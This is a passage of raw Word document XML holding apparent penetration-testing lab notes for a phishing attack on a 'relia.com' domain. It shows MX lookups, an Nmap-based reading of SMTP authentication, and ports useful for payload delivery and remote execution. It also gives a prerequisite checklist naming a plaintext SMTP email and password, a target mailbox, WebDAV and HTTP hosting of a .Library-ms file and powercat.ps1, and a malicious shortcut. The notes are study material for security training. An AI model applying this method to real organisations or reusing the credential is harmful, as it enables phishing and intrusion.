          <w:ilvl w:val="0"/>
          <w:numId w:val="687"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dig MX relia.com +short</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002730">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="687"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> relia.com </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with your domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002731">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="687"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example Output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002732">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="687"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10 mail1.relia.com.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002733">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="687"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">20 mail2.relia.com.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002734">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="687"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The numbers are priority values (lower is higher priority). These are the servers other mail servers use to deliver mail to @relia.com.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002735">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002736">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also check MX for domain using nslookup:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002737">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nslookup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002738">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; set type=mx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002739">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; relia.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000273A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000273B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000273C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the Nmap scan:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000273D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="586"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 25 (SMTP) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– Standard, but often restricted or unauthenticated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000273E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="586"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You authenticated via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AUTH LOGIN</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the port was open with that capability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000273F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="586"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 587 (SMTP with STARTTLS)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Most important here, as this is typically used for authenticated and encrypted email sending. Your swaks command likely used this.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002740">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="586"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You authenticated via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AUTH LOGIN</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the port was open with that capability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002741">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Therefore, for sending the phishing mail, port 587 was the critical one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002742">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002743">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2806700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="345" name="image343.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image343.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId812"/>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2744">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can see </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AUTH LOGIN </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in the banner of nmap scan for BOTH 25 and 587</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002745">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Means that the mail server (SMTP) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">supports authentication using username and password!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002746">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002747">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Other Open Ports (Not Essential for the Phishing Itself but Contextually Useful)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002748">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="832"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">110 (POP3) and 143 (IMAP) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– Used to receive mail. Not needed for your attack unless you wanted to check if the target received/opened the mail (e.g., on a box you own).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002749">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="832"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">445/139 (SMB) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– Could be useful if you wanted to do payload delivery via SMB shares.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000274A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="832"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5985 (WinRM) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– Could allow post-exploitation RCE if you get creds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000274B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="832"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">135 (MSRPC)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Background Windows service, not directly useful in this case.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000274C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000274D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Non-Port Prerequisites:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000274E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here’s a checklist of other prerequisites that must be satisfied for this type of attack to work:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000274F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Valid SMTP credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002750">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You need a working email/password pair (maildmz@relia.com : DPuBT9tGCBrTbR).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002751">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These creds must be allowed to send mail via the target SMTP server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002752">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMTP server that allows authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002753">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It must support AUTH LOGIN, which your target did (as shown by smtp-commands in Nmap).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002754">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Target email address you want to phish</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002755">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In your case: </w:t>
      </w:r>
      <w:hyperlink r:id="rId813">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">jim@relia.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002756">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload delivery infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002757">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WebDAV server to host the .Library-ms file (served over HTTP, usually port 80).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002758">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP server to host powercat.ps1 (also port 8000 in your case).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002759">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These should be accessible to the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000275A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious shortcut or file that can execute your payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000275B">
